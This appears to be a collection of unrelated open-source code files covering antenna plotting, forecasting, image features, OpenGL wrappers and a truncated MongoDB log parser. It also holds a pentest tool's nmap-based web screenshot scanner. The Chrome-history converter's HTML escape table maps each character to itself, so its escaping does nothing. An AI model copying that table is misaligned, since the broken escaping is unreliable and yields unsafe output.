pylayers/antprop/examples/ex_antenna2.py | usmanwardag/pylayers | 143 | 11096710 | from pylayers.antprop.antenna import *
from pylayers.antprop.antvsh import *
import matplotlib.pylab as plt
from numpy import *
import pdb
"""
This test :
1 : loads a measured antenna
2 : applies an electrical delay obtained from data with getdelay method
3 : evaluate the antenna vsh coefficient with a downsampling factor of 2
4 : display the 16 first
"""
filename = 'S1R1.mat'
A = Antenna(filename,directory='ant/UWBAN/Matfile')
#plot(freq,angle(A.Ftheta[:,maxPowerInd[1],maxPowerInd[2]]*exp(2j*pi*freq.reshape(len(freq))*electricalDelay)))
freq = A.fa.reshape(104,1,1)
delayCandidates = arange(-10,10,0.001)
electricalDelay = A.getdelay(freq,delayCandidates)
disp('Electrical Delay = ' + str(electricalDelay)+' ns')
A.Ftheta = A.Ftheta*exp(2*1j*pi*freq*electricalDelay)
A.Fphi = A.Fphi*exp(2*1j*pi*freq*electricalDelay)
dsf = 2
#
# Calculate Vector Spherical Harmonics
#
A = vsh(A,dsf)
v = np.abs(A.C.Br.s1)
u = np.nonzero(v==v.max())
plt.figure(figsize=(15,15))
for l in range(16):
plt.subplot(4,4,l+1)
plt.plot(np.real(A.C.Br.s1[:,l,0]),np.imag(A.C.Br.s1[:,l,0]),'k')
plt.plot(np.real(A.C.Br.s1[:,l,1]),np.imag(A.C.Br.s1[:,l,1]),'b')
plt.plot(np.real(A.C.Br.s1[:,l,2]),np.imag(A.C.Br.s1[:,l,2]),'r')
plt.plot(np.real(A.C.Br.s1[:,l,2]),np.imag(A.C.Br.s1[:,l,2]),'g')
plt.axis([-0.6,0.6,-0.6,0.6])
plt.title('l='+str(l))
plt.show()
|
greykite/sklearn/uncertainty/base_uncertainty_model.py | kenzie-q/greykite | 1,503 | 11096727 | # BSD 2-CLAUSE LICENSE
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# #ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# original author: <NAME>
"""Defines the base uncertainty model class. All uncertainty models should inherit this class."""
from abc import abstractmethod
from typing import Dict
from typing import Optional
import pandas as pd
class BaseUncertaintyModel:
"""The base uncertainty model.
Attributes
----------
uncertainty_dict : `dict` [`str`, any]
The uncertainty model specification. It should have the following keys:
"uncertainty_method": a string that is in
`~greykite.sklearn.uncertainty.uncertainty_methods.UncertaintyMethodEnum`.
"params": a dictionary that includes any additional parameters needed by the uncertainty method.
uncertainty_method : `str` or None
The name of the uncertainty model.
Must be in `~greykite.sklearn.uncertainty.uncertainty_methods.UncertaintyMethodEnum`.
params : `dict` [`str`, any] or None
The parameters to be fed into the uncertainty model.
train_df : `pandas.DataFrame` or None
The data used to fit the uncertainty model.
uncertainty_model : any or None
The uncertainty model.
pred_df : `pandas.DataFrame`
The prediction result df.
"""
def __init__(
self,
uncertainty_dict: Dict[str, any],
**kwargs):
self.uncertainty_dict = uncertainty_dict
for key, value in kwargs.items():
setattr(self, key, value)
# Set by ``fit`` method.
self.uncertainty_method: Optional[str] = None
self.params: Optional[dict] = None
self.train_df: Optional[pd.DataFrame] = None
self.uncertainty_model: Optional[any] = None
# Set by ``predict`` method.
self.pred_df: Optional[pd.DataFrame] = None
@abstractmethod
def _check_input(self):
"""Checks that necessary input are provided in ``self.uncertainty_dict`` and ``self.train_df``.
To be called after setting ``self.train_df`` in ``self.fit``.
Every subclass need to override this method to check their own inputs.
Do not raise errors other than
`~greykite.sklearn.uncertainty.exceptions.UncertaintyError`,
since this type of error will be catched and won't fail the whole pipeline.
"""
if self.uncertainty_dict is None:
self.uncertainty_dict = {}
def fit(
self,
train_df: pd.DataFrame):
"""Fits the uncertainty model.
Parameters
----------
train_df : `pandas.DataFrame`
The training data.
"""
self.train_df = train_df
def predict(
self,
fut_df: pd.DataFrame):
"""Predicts the uncertainty columns for ``fut_df``.
Parameters
----------
fut_df : `pandas.DataFrame`
The data used for prediction.
"""
pass
|
test/test_wrong_exception_protocolbase_getitem.py | Duiesel/python-jsonschema-objects | 329 | 11096739 | import pytest
import python_jsonschema_objects as pjo
@pytest.fixture
def base_schema():
return {
"title": "example",
"type": "object",
"additionalProperties": False,
"properties": {
"dictLike": {"additionalProperties": {"type": "integer"}, "type": "object"}
},
}
def test_wrong_exception_protocolbase_getitem(base_schema):
"""
to declare a dict like object in json-schema, we are supposed
to declare it as an object of additional properties.
When trying to use it as dict, for instance testing if a key is inside
the dictionary, methods like __contains__ in the ProtocolBase expect
__getitem__ to raise a KeyError. getitem calls __getattr__ without any
exception handling, which raises an AttributeError (necessary for proper
behaviour of getattr, for instance).
Solution found is to handle AttributeError in getitem and to raise KeyError
"""
builder = pjo.ObjectBuilder(base_schema)
ns = builder.build_classes()
t = ns.Example(dictLike={"a": 0, "b": 1})
t.validate()
assert "a" in t.dictLike
assert "c" not in t.dictLike
assert getattr(t, "not_present", None) is None
with pytest.raises(AttributeError):
assert "a" not in t.notAnAttribute
if __name__ == "__main__":
test_wrong_exception_protocolbase_getitem(base_schema())
|
unsilence/lib/intervals/Interval.py | RomanKornev/unsilence | 236 | 11096756 | class Interval:
"""
Represents a section in time where the media file is either silent or audible
"""
def __init__(self, start=0, end=0, is_silent=False):
"""
Initializes an Interval object
:param start: Start time of the interval in seconds
:param end: End time of the interval in seconds
:param is_silent: Whether the interval is silent or not
"""
self.__start = start
self.__end = end
self.__duration = self.__end - self.__start
self.is_silent = is_silent
@property
def start(self):
"""
Get the start time
:return: start time in seconds
"""
return self.__start
@start.setter
def start(self, new_start):
"""
Sets the new start time and updates the duration
:param new_start: start time in seconds
:return: None
"""
self.__start = new_start
self.__duration = self.__end - self.__start
@property
def end(self):
"""
Get the end time
:return: end time in seconds
"""
return self.__end
@end.setter
def end(self, new_end):
"""
Sets the new end time and updates the duration
:param new_end: start time in seconds
:return: None
"""
self.__end = new_end
self.__duration = self.__end - self.__start
@property
def duration(self):
"""
Returns the duration of the interval
:return: Duration of the interval
"""
return self.__duration
def enlarge_audible_interval(self, stretch_time, is_start_interval=False, is_end_interval=False):
"""
Enlarges/Shrinks the audio interval, based on if it is silent or not
:param stretch_time: Time the interval should be enlarged/shrunken
:param is_start_interval: Whether the current interval is at the start (should not enlarge/shrink)
:param is_end_interval: Whether the current interval is at the end (should not enlarge/shrink)
:return: None
"""
if stretch_time >= self.duration:
raise Exception("Stretch time to large, please choose smaller size")
stretch_time_part = (-1 if self.is_silent else 1) * stretch_time / 2
if not is_start_interval:
self.start -= stretch_time_part
if not is_end_interval:
self.end += stretch_time_part
def copy(self):
"""
Creates a deep copy of this Interval
:return: Interval deepcopy
"""
return Interval(self.start, self.end, self.is_silent)
def serialize(self):
"""
Serializes the current interval into a dict format
:return: serialized dict
"""
return {"start": self.start, "end": self.end, "is_silent": self.is_silent}
@staticmethod
def deserialize(serialized_obj: dict):
"""
Deserializes a previously serializes Interval and generates a new Interval with this data
:param serialized_obj: previously serializes Interval (type dict)
:return: Interval
"""
return Interval(serialized_obj["start"], serialized_obj["end"], serialized_obj["is_silent"])
def __repr__(self):
"""
String representation
:return: String representation
"""
return f"<Interval start={self.start} end={self.end} duration={self.duration} is_silent={self.is_silent}>"
|
mahotas/features/tas.py | langner/mahotas | 541 | 11096777 | <reponame>langner/mahotas
# Copyright (C) 2008-2012, <NAME> <<EMAIL>>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
# Carnegie Mellon University
#
# License: MIT (see COPYING file)
import numpy as np
from ..convolve import convolve
from ..thresholding import otsu
__all__ = ['pftas', 'tas']
_M2 = np.ones((3, 3))
_M2[1, 1] = 10
_bins2 = np.arange(11)
_M3 = np.ones((3, 3, 3))
_M3[1,1,1] = _M3.sum() + 1
_bins3 = np.arange(28)
def _tas(img, thresh, margin):
if len(img.shape) == 2:
M = _M2
bins = _bins2
saved = 9
elif len(img.shape) == 3:
M = _M3
bins = _bins3
saved = 27
else:
raise ValueError('mahotas.tas: Cannot compute TAS for image of %s dimensions' % len(img.shape))
def _ctas(img):
V = convolve(img.astype(np.uint8), M)
values,_ = np.histogram(V, bins=bins)
values = values[:saved]
s = values.sum()
if s > 0:
return values/float(s)
return values
def _compute(bimg):
alltas.append(_ctas(bimg))
allntas.append(_ctas(~bimg))
alltas = []
allntas = []
total = np.sum(img > thresh)
mu = ((img > thresh)*img).sum() / (total + 1e-8)
_compute( (img > mu - margin) * (img < mu + margin) )
_compute(img > mu - margin)
_compute(img > mu)
return np.concatenate(alltas + allntas)
def tas(img):
'''
values = tas(img)
Compute Threshold Adjacency Statistics
TAS were presented by Hamilton et al. in "Fast automated cell phenotype
image classification" (http://www.biomedcentral.com/1471-2105/8/110)
Also returns a version computed on the negative of the binarisation defined
by Hamilton et al.
See also pftas() for a variation without any hardcoded parameters.
Parameters
----------
img : ndarray, 2D or 3D
input image
Returns
-------
values : ndarray
A 1-D ndarray of feature values
See Also
--------
pftas : Parameter free TAS
'''
return _tas(img, 30, 30)
def pftas(img, T=None):
'''
values = pftas(img, T={mahotas.threshold.otsu(img)})
Compute parameter free Threshold Adjacency Statistics
TAS were presented by Hamilton et al. in "Fast automated cell phenotype
image classification" (http://www.biomedcentral.com/1471-2105/8/110)
The current version is an adapted version which is free of parameters. The
thresholding is done by using Otsu's algorithm (or can be pre-computed and
passed in by setting `T`), the margin around the mean of pixels to be
included is the standard deviation. This was first published by Coelho et
al. in "Structured Literature Image Finder: Extracting Information from
Text and Images in Biomedical Literature"
(http://www.springerlink.com/content/60634778710577t0/)
Also returns a version computed on the negative of the binarisation defined
by Hamilton et al.
Use tas() to get the original version of the features.
Parameters
----------
img : ndarray, 2D or 3D
input image
T : integer, optional
Threshold to use (default: compute with otsu)
Returns
-------
values : ndarray
A 1-D ndarray of feature values
'''
if T is None:
T = otsu(img)
pixels = img[img > T].ravel()
if len(pixels) == 0:
std = 0
else:
std = pixels.std()
return _tas(img, T, std)
|
test/functions/lambda7.py | kylebarron/MagicPython | 1,482 | 11096790 | <filename>test/functions/lambda7.py
anon = lambda a, c={'key':
555}, e=fff: None
anon : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
lambda : meta.lambda-function.python, source.python, storage.type.function.lambda.python
: meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
a : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python, variable.parameter.function.language.python
, : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.separator.parameters.python, source.python
: meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
c : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python, variable.parameter.function.language.python
= : keyword.operator.python, meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
{ : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.definition.dict.begin.python, source.python
' : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.definition.string.begin.python, source.python, string.quoted.single.python
key : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python, string.quoted.single.python
' : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.definition.string.end.python, source.python, string.quoted.single.python
: : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.separator.dict.python, source.python
: meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
: meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
555 : constant.numeric.dec.python, meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
} : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.definition.dict.end.python, source.python
, : meta.function.lambda.parameters.python, meta.lambda-function.python, punctuation.separator.parameters.python, source.python
: meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
e : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python, variable.parameter.function.language.python
= : keyword.operator.python, meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
fff : meta.function.lambda.parameters.python, meta.lambda-function.python, source.python
: : meta.lambda-function.python, punctuation.section.function.lambda.begin.python, source.python
: source.python
None : constant.language.python, source.python
|
axes/__init__.py | LucienC/django-axes | 831 | 11096813 | <gh_stars>100-1000
from pkg_resources import get_distribution
import django
if django.VERSION < (3, 2):
default_app_config = "axes.apps.AppConfig"
__version__ = get_distribution("django-axes").version
|
17-it-generator/tree/extra/drawtree.py | fluentpython/example-code-2e | 990 | 11096833 | from tree import tree
SP = '\N{SPACE}'
HLIN = '\N{BOX DRAWINGS LIGHT HORIZONTAL}' # ─
ELBOW = f'\N{BOX DRAWINGS LIGHT UP AND RIGHT}{HLIN*2}{SP}' # └──
TEE = f'\N{BOX DRAWINGS LIGHT VERTICAL AND RIGHT}{HLIN*2}{SP}' # ├──
PIPE = f'\N{BOX DRAWINGS LIGHT VERTICAL}{SP*3}' # │
def render_lines(tree_iter):
cls, _, _ = next(tree_iter)
yield cls.__name__
prefix = ''
for cls, level, last in tree_iter:
prefix = prefix[:4 * (level-1)]
prefix = prefix.replace(TEE, PIPE).replace(ELBOW, SP*4)
prefix += ELBOW if last else TEE
yield prefix + cls.__name__
def draw(cls):
for line in render_lines(tree(cls)):
print(line)
if __name__ == '__main__':
draw(BaseException)
|
build/build/root/opt/bin/py-chrome-history.py | scobiehague/dotfiles | 117 | 11096842 | <reponame>scobiehague/dotfiles<filename>build/build/root/opt/bin/py-chrome-history.py<gh_stars>100-1000
#!/usr/bin/python2
# py-chrome-history
#
# A script to convert Google Chrome's history file to the standard HTML-ish
# bookmarks file format.
#
# Copyright (c) 2011 <NAME>. This program is released under the ISC
# license, which you can find in the file LICENSE.md.
import sys, os, sqlite3
script_version = "1.1"
# html escaping code from http://wiki.python.org/moin/EscapingHtml
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
def html_escape(text):
return ''.join(html_escape_table.get(c,c) for c in text)
def sanitize(string):
res = ''
string = html_escape(string)
for i in range(len(string)):
if ord(string[i]) > 127:
res += '&#x%x;' % ord(string[i])
else:
res += string[i]
return res
def version_text():
old_out = sys.stdout
sys.stdout = sys.stderr
print "py-chrome-history", script_version
print "(c) 2011, <NAME>"
print "https://github.com/bdesham/py-chrome-bookmarks"
sys.stdout = old_out
def help_text():
version_text()
old_out = sys.stdout
sys.stdout = sys.stderr
print
print "usage: python py-chrome-history input-file output-file"
print " input-file is the Chrome history file"
print " output-file is the destination for the generated HTML bookmarks file"
sys.stdout = old_out
# check for help or version requests
if "-v" in sys.argv or "--version" in sys.argv:
version_text()
exit()
if len(sys.argv) != 3 or "-h" in sys.argv or "--help" in sys.argv:
help_text()
exit()
# the actual code here...
in_file = os.path.expanduser(sys.argv[1])
out_file = os.path.expanduser(sys.argv[2])
connection = sqlite3.connect(in_file)
curs = connection.cursor()
try:
out = open(out_file, 'w')
except IOError, e:
print >> sys.stderr, "py-chrome-history: error opening the output file."
print >> sys.stderr, e
exit()
out.write("""<!DOCTYPE NETSCAPE-Bookmark-file-1>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8' />
<title>Bookmarks</title>
<h1>Bookmarks</h1>
<dl><p>
<dl><dt><h3>History</h3>
<dl><p>""")
curs.execute("SELECT url, title FROM urls")
for row in curs:
if len(row[1]) > 0:
out.write('<dt><a href="%s">%s</a>\n' % (sanitize(row[0]), sanitize(row[1])))
connection.close()
out.write("</dl></p>\n</dl>")
out.close()
|
lib/screenscan.py | nkrios/flashlight | 197 | 11096859 | <filename>lib/screenscan.py
try:
import re
import shlex
import datetime
import subprocess
from lib.core.core import Core
from lib.screen.webscan import WebScan
from lib.core.threadpool import Worker,ThreadPool
except ImportError, err:
from lib.core.core import Core
Core.print_error(err)
class ScreenScan(WebScan):
def __init__(self, args):
self.__urls = []
self.__args = args
WebScan.__init__(self, self.__args)
def _run(self, logger):
cmd = "{0} {1}".format(Core._commands_path["nmap"], self._nmap_options)
logger._logging("START: Nmap Screen Scan: {0}".format(cmd))
cmd_list = shlex.split(cmd)
proc = subprocess.Popen(cmd_list, stdout = subprocess.PIPE, stderr = subprocess.PIPE,).communicate()
logger._logging("STOP: Nmap Screen Scan")
self.__parse_nmap_scan(logger)
def __parse_nmap_scan(self, logger):
self._result_file.seek(0)
for line in self._result_file:
for port in self._scan_options.split(","):
if re.search("{0}/open/tcp".format(port), line):
ip = line.split()[1]
if port != "443":
self.__urls.append("http://{0}:{1}".format(ip,port))
else:
self.__urls.append("https://{0}:443".format(ip))
self._result_file.close()
if self.__urls:
self.__take_screenshot(logger)
def __take_screenshot(self, logger):
logger._logging("START: Screen Scan {0} threads".format(self.__args.thread))
pool = ThreadPool(self.__args.thread)
for url in self.__urls:
output_file = "{0}{1}_{2}.png".format(self._output_dir, url.split("/")[2], datetime.datetime.now().strftime("%Y%m%d%H%M%S"))
phantomjs_cmd = "{0} --ignore-ssl-errors=true {1} {2} {3}".format(Core._commands_path["phantomjs"], self.__args.rasterize, url, output_file)
logger._logging("Taking screenshot: {0}".format(url.split("/")[2]))
pool.add_task(self.__run_phantomjs, phantomjs_cmd)
pool.wait_completion()
logger._logging("Finished Screenshot Scan. Results saved in {0} folder".format(self._output_dir))
def __run_phantomjs(self, cmd):
cmd_list = shlex.split(cmd)
proc = subprocess.Popen(cmd_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE,).communicate()
|
configs/detection/attention_rpn/coco/attention-rpn_r50_c4_4xb2_coco_official-10shot-fine-tuning.py | BIGWangYuDong/mmfewshot | 376 | 11096860 | <reponame>BIGWangYuDong/mmfewshot
_base_ = [
'../../_base_/datasets/query_aware/few_shot_coco.py',
'../../_base_/schedules/schedule.py', '../attention-rpn_r50_c4.py',
'../../_base_/default_runtime.py'
]
# classes splits are predefined in FewShotCocoDataset
# FewShotCocoDefaultDataset predefine ann_cfg for model reproducibility
num_support_ways = 2
num_support_shots = 9
data = dict(
train=dict(
num_support_ways=num_support_ways,
num_support_shots=num_support_shots,
repeat_times=50,
dataset=dict(
type='FewShotCocoDefaultDataset',
ann_cfg=[dict(method='Attention_RPN', setting='Official_10SHOT')],
num_novel_shots=10,
classes='NOVEL_CLASSES',
instance_wise=False)),
val=dict(
classes='NOVEL_CLASSES',
ann_cfg=[
dict(
type='ann_file',
ann_file='data/coco/annotations/instances_val2017.json')
]),
test=dict(
classes='NOVEL_CLASSES',
ann_cfg=[
dict(
type='ann_file',
ann_file='data/coco/annotations/instances_val2017.json')
]),
model_init=dict(classes='NOVEL_CLASSES'))
evaluation = dict(interval=3000)
checkpoint_config = dict(interval=3000)
optimizer = dict(
lr=0.001,
momentum=0.9,
paramwise_cfg=dict(custom_keys={'roi_head.bbox_head': dict(lr_mult=2.0)}))
lr_config = dict(
warmup_iters=200, warmup_ratio=0.1, step=[
2000,
3000,
])
log_config = dict(interval=10)
runner = dict(max_iters=3000)
# load_from = 'path of base training model'
load_from = ('work_dirs/attention-rpn_r50_c4_4xb2_coco_official-base-training/'
'latest.pth')
model = dict(
frozen_parameters=['backbone'],
rpn_head=dict(
num_support_ways=num_support_ways,
num_support_shots=num_support_shots,
),
roi_head=dict(
num_support_ways=num_support_ways,
num_support_shots=num_support_shots,
),
)
|
deep-rl/lib/python2.7/site-packages/OpenGL/GL/ARB/vertex_type_2_10_10_10_rev.py | ShujaKhalid/deep-rl | 210 | 11096866 | '''OpenGL extension ARB.vertex_type_2_10_10_10_rev
This module customises the behaviour of the
OpenGL.raw.GL.ARB.vertex_type_2_10_10_10_rev to provide a more
Python-friendly API
Overview (from the spec)
This extension adds the following data formats:
Two new vertex attribute data formats: a signed 2.10.10.10 and an
unsigned 2.10.10.10 vertex data format. These vertex data formats
describe a 4 component stream which can be used to store normals or
other attributes in a quantized form. Normals, tangents, binormals
and other vertex attributes can often be specified at reduced
precision without introducing noticeable artifacts, reducing the
amount of memory and memory bandwidth they consume.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/vertex_type_2_10_10_10_rev.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.vertex_type_2_10_10_10_rev import *
from OpenGL.raw.GL.ARB.vertex_type_2_10_10_10_rev import _EXTENSION_NAME
def glInitVertexType2101010RevARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
glVertexAttribP1uiv=wrapper.wrapper(glVertexAttribP1uiv).setInputArraySize(
'value', 1
)
glVertexAttribP2uiv=wrapper.wrapper(glVertexAttribP2uiv).setInputArraySize(
'value', 1
)
glVertexAttribP3uiv=wrapper.wrapper(glVertexAttribP3uiv).setInputArraySize(
'value', 1
)
glVertexAttribP4uiv=wrapper.wrapper(glVertexAttribP4uiv).setInputArraySize(
'value', 1
)
glVertexP2uiv=wrapper.wrapper(glVertexP2uiv).setInputArraySize(
'value', 1
)
glVertexP3uiv=wrapper.wrapper(glVertexP3uiv).setInputArraySize(
'value', 1
)
glVertexP4uiv=wrapper.wrapper(glVertexP4uiv).setInputArraySize(
'value', 1
)
glTexCoordP1uiv=wrapper.wrapper(glTexCoordP1uiv).setInputArraySize(
'coords', 1
)
glTexCoordP2uiv=wrapper.wrapper(glTexCoordP2uiv).setInputArraySize(
'coords', 1
)
glTexCoordP3uiv=wrapper.wrapper(glTexCoordP3uiv).setInputArraySize(
'coords', 1
)
glTexCoordP4uiv=wrapper.wrapper(glTexCoordP4uiv).setInputArraySize(
'coords', 1
)
glMultiTexCoordP1uiv=wrapper.wrapper(glMultiTexCoordP1uiv).setInputArraySize(
'coords', 1
)
glMultiTexCoordP2uiv=wrapper.wrapper(glMultiTexCoordP2uiv).setInputArraySize(
'coords', 1
)
glMultiTexCoordP3uiv=wrapper.wrapper(glMultiTexCoordP3uiv).setInputArraySize(
'coords', 1
)
glMultiTexCoordP4uiv=wrapper.wrapper(glMultiTexCoordP4uiv).setInputArraySize(
'coords', 1
)
glNormalP3uiv=wrapper.wrapper(glNormalP3uiv).setInputArraySize(
'coords', 1
)
glColorP3uiv=wrapper.wrapper(glColorP3uiv).setInputArraySize(
'color', 1
)
glColorP4uiv=wrapper.wrapper(glColorP4uiv).setInputArraySize(
'color', 1
)
glSecondaryColorP3uiv=wrapper.wrapper(glSecondaryColorP3uiv).setInputArraySize(
'color', 1
)
### END AUTOGENERATED SECTION |
dex/parsers.py | qintangtao/python.dex | 291 | 11096876 | __author__ = 'eric'
import re
from utils import pretty_json, small_json, yamlfy
from time import strptime, mktime
from datetime import datetime
import traceback
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
################################################################################
# Query masking and scrubbing functions
################################################################################
def scrub(e):
if isinstance(e, dict):
return scrub_doc(e)
elif isinstance(e, list):
return scrub_list(e)
else:
return None
def scrub_doc(d):
for k in d:
if k in ['$in', '$nin', '$all']:
d[k] = ["<val>"]
else:
d[k] = scrub(d[k])
if d[k] is None:
d[k] = "<val>"
return d
def scrub_list(a):
v = []
for e in a:
e = scrub(e)
if e is not None:
v.append(scrub(e))
return sorted(v)
ts_rx = re.compile('^(?P<ts>[a-zA-Z]{3} [a-zA-Z]{3} {1,2}\d+ \d{2}:\d{2}:\d{2}).*')
def get_line_time(line):
ts = None
match = ts_rx.match(line)
if match:
year = datetime.utcnow().year
timestamp = mktime(strptime(match.group('ts') + ' ' + str(year), '%a %b %d %H:%M:%S %Y'))
ts = datetime.fromtimestamp(timestamp)
return ts
################################################################################
# Parser
# Provides a parse function that passes input to a round of handlers.
################################################################################
class Parser(object):
def __init__(self, handlers):
self._line_handlers = handlers
def parse(self, input):
"""Passes input to each QueryLineHandler in use"""
query = None
for handler in self._line_handlers:
try:
query = handler.handle(input)
except Exception as e:
query = None
finally:
if query is not None:
return query
return None
################################################################################
# ProfileParser
# Extracts queries from profile entries using a single ProfileEntryHandler
################################################################################
class ProfileParser(Parser):
def __init__(self):
"""Declares the QueryLineHandlers to use"""
super(ProfileParser, self).__init__([self.ProfileEntryHandler()])
def get_line_time(self, input):
return input['ts'] if 'ts' in input else None
############################################################################
# Base ProfileEntryHandler class
# Knows how to yamlfy a logline query
############################################################################
class ProfileEntryHandler:
########################################################################
def handle(self, input):
result = OrderedDict()
query = None
orderby = None
if (input is not None) and (input.has_key('op')):
if input['op'] == 'query':
if input['query'].has_key('$query'):
query = input['query']['$query']
if input['query'].has_key('$orderby'):
orderby = input['query']['$orderby']
else:
query = input['query']
result['ns'] = input['ns']
elif input['op'] == 'update':
query = input['query']
if input.has_key('updateobj'):
if input['updateobj'].has_key('orderby'):
orderby = input['updateobj']['orderby']
result['ns'] = input['ns']
elif ((input['op'] == 'command') and
((input['command'].has_key('count')) or
(input['command'].has_key('findAndModify')))):
query = input['command']['query']
db = input['ns'][0:input['ns'].rfind('.')]
result['ns'] = db + "." + input['command']['count']
else:
return None
toMask = OrderedDict()
if orderby is not None:
result['orderby'] = orderby
toMask['$orderby'] = orderby
result['query'] = scrub(query)
toMask['$query'] = query
result['queryMask'] = small_json(toMask)
result['stats'] = {'millis': input['millis']}
return result
else:
return None
################################################################################
# LogParser
# Extracts queries from log lines using a list of QueryLineHandlers
################################################################################
class LogParser(Parser):
def __init__(self):
"""Declares the QueryLineHandlers to use"""
super(LogParser, self).__init__([CmdQueryHandler(),
UpdateQueryHandler(),
StandardQueryHandler(),
TimeLineHandler()])
############################################################################
# Base QueryLineHandler class
# Knows how to yamlfy a logline query
############################################################################
class QueryLineHandler:
########################################################################
def parse_query(self, extracted_query):
return yamlfy(extracted_query)
def handle(self, line):
result = self.do_handle(line)
if result is not None:
result['ts'] = get_line_time(line)
return result
def do_handle(self, line):
return None
def parse_line_stats(self, stat_string):
line_stats = {}
split = stat_string.split(" ")
for stat in split:
if stat is not "" and stat is not None and stat != "locks(micros)":
stat_split = stat.split(":")
if (stat_split is not None) and (stat_split is not "") and (len(stat_split) is 2):
try:
line_stats[stat_split[0]] = int(stat_split[1])
except:
pass
return line_stats
def standardize_query(self, query_yaml):
if len(query_yaml.keys()) == 1:
if '$query' in query_yaml:
return scrub(query_yaml)
if 'query' in query_yaml:
return OrderedDict([('$query', scrub(query_yaml['query']))])
if len(query_yaml.keys()) == 2:
query = None
orderby = None
if 'query' in query_yaml:
query = query_yaml['query']
elif '$query' in query_yaml:
query = query_yaml['$query']
if 'orderby' in query_yaml:
orderby = query_yaml['orderby']
elif '$orderby' in query_yaml:
orderby = query_yaml['$orderby']
if query is not None and orderby is not None:
return OrderedDict([('$query', scrub(query)),
('$orderby', orderby)])
return OrderedDict([('$query', scrub(query_yaml))])
############################################################################
# StandardQueryHandler
# QueryLineHandler implementation for general queries (incl. getmore)
############################################################################
class StandardQueryHandler(QueryLineHandler):
########################################################################
def __init__(self):
self.name = 'Standard Query Log Line Handler'
self._regex = '.*\[(?P<connection>\S*)\] '
self._regex += '(?P<operation>\S+) (?P<ns>\S+\.\S+) query: '
self._regex += '(?P<query>\{.*\}) (?P<stats>(\S+ )*)'
self._regex += '(?P<query_time>\d+)ms'
self._rx = re.compile(self._regex)
########################################################################
def do_handle(self, input):
match = self._rx.match(input)
if match is not None:
parsed = self.parse_query(match.group('query'))
if parsed is not None:
result = OrderedDict()
scrubbed = self.standardize_query(parsed)
result['query'] = scrubbed['$query']
if '$orderby' in scrubbed:
result['orderby'] = scrubbed['$orderby']
result['queryMask'] = small_json(scrubbed)
result['ns'] = match.group('ns')
result['stats'] = self.parse_line_stats(match.group('stats'))
result['stats']['millis'] = match.group('query_time')
result['supported'] = True
return result
return None
############################################################################
# CmdQueryHandler
# QueryLineHandler implementation for $cmd queries (count, findandmodify)
############################################################################
class CmdQueryHandler(QueryLineHandler):
########################################################################
def __init__(self):
self.name = 'CMD Log Line Handler'
self._regex = '.*\[conn(?P<connection_id>\d+)\] '
self._regex += 'command (?P<db>\S+)\.\$cmd command: '
self._regex += '(?P<query>\{.*\}) (?P<stats>(\S+ )*)'
self._regex += '(?P<query_time>\d+)ms'
self._rx = re.compile(self._regex)
########################################################################
def do_handle(self, input):
match = self._rx.match(input)
if match is not None:
parsed = self.parse_query(match.group('query'))
if parsed is not None:
result = OrderedDict()
result['stats'] = self.parse_line_stats(match.group('stats'))
result['stats']['millis'] = match.group('query_time')
command = parsed.keys()[0]
toMask = OrderedDict()
result['command'] = command
result['supported'] = True
if command.lower() == 'count':
result['ns'] = match.group('db') + '.'
result['ns'] += parsed[command]
query = self.standardize_query(parsed['query'])
result['query'] = query['$query']
toMask = query
elif command.lower() == 'findandmodify':
if 'sort' in parsed:
result['orderby'] = parsed['sort']
toMask['$orderby'] = parsed['sort']
result['ns'] = match.group('db') + '.'
result['ns'] += parsed[command]
query = self.standardize_query(parsed['query'])
result['query'] = query['$query']
if 'sort' in parsed:
